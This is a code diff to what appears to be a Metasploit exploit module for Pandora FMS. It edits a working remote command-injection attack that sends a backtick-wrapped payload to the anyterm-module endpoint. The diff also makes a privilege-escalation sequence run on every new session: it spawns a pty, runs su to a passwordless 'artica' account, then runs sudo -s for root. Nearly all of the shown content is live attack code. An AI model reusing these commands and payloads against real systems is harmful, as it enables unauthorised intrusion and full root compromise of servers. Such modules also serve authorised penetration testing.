Changes made to pandora_fms_exec module as requested

2014-02-03 14:10:27 +07:00 · 2014-02-03 14:10:27 +07:00 · 50f860757b
parent 9a929e75e4
commit 50f860757b
1 changed files with 11 additions and 19 deletions
--- a/modules/exploits/linux/http/pandora_fms_exec.rb
+++ b/modules/exploits/linux/http/pandora_fms_exec.rb
@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStagerEcho
  include Msf::Exploit::EXE

  def initialize(info={})
@ -55,24 +54,17 @@ class Metasploit3 < Msf::Exploit::Remote
      [
       Opt::RPORT(8023),
       OptString.new('TARGETURI', [true, 'The base path to the Pandora instance', '/']),
-       OptBool.new('PRIVESC', [true, 'Try to escalate privileges to root', false])
      ], self.class)
  end

  def on_new_session(client)
-    if datastore['PRIVESC'] == true
-      print_status("#{peer} - Trying to escalate privileges to root")
-      # Spawn a pty for su/sudo
-      client.shell_command_token("python -c 'import pty;pty.spawn(\"/bin/sh\")'")
-      # Su to the passwordless "artica" account
-      client.shell_command_token("su - artica")
-      # The "artica" use has sudo rights without the need for a password, thus gain root priveleges
-      client.shell_command_token("sudo -s")
-    end
-  end
-
-  def uri
-    return target_uri.path
+    print_status("#{peer} - Trying to escalate privileges to root")
+    # Spawn a pty for su/sudo
+    client.shell_command_token("python -c 'import pty;pty.spawn(\"/bin/sh\")'")
+    # Su to the passwordless "artica" account
+    client.shell_command_token("su - artica")
+    # The "artica" use has sudo rights without the need for a password, thus gain root priveleges
+    client.shell_command_token("sudo -s")
  end

  def peer
@ -85,12 +77,12 @@ class Metasploit3 < Msf::Exploit::Remote

    res = send_request_cgi({
     'method' => 'GET',
-     'uri'    => normalize_uri(uri, "anyterm.html")
+     'uri'    => normalize_uri(target_uri.path, "anyterm.html")
    })

    if res and res.code == 200 and res.body =~ /Pandora FMS Remote Gateway/
      print_good("#{peer} - Pandora FMS Remote Gateway Detected!")
-      return Exploit::CheckCode::Unknown
+      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
@ -100,10 +92,10 @@ class Metasploit3 < Msf::Exploit::Remote
    print_status("#{peer} - Sending payload")
    res = send_request_cgi({
      'method' => 'POST',
-      'uri'    => normalize_uri(uri, "/anyterm-module"),
+      'uri'    => normalize_uri(target_uri.path, "/anyterm-module"),
      'vars_post'   => {
        'a'     => "open",
-        'p' => "`#{payload.raw}`"
+        'p' => "`nohup #{payload.encoded}`"
      }
    })